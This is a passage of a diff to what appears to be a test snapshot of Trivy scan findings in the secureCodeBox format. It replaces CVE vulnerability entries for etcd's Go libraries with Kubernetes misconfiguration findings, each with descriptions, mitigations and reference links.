"KSV015", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, - "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - }, - { - "type": "URL", - "value": "https://go.dev/cl/340830", - }, - { - "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3134-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3161-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3366-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u11", + "foundIn": "Target: 'k8s.gcr.io/kube-scheduler:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3412-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0040", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0040", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Edit the Scheduler pod specification file /etc/kubernetes/manifests/kube-scheduler.yaml file on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://avd.aquasec.com/misconfig/kcv0040", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", ], }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": 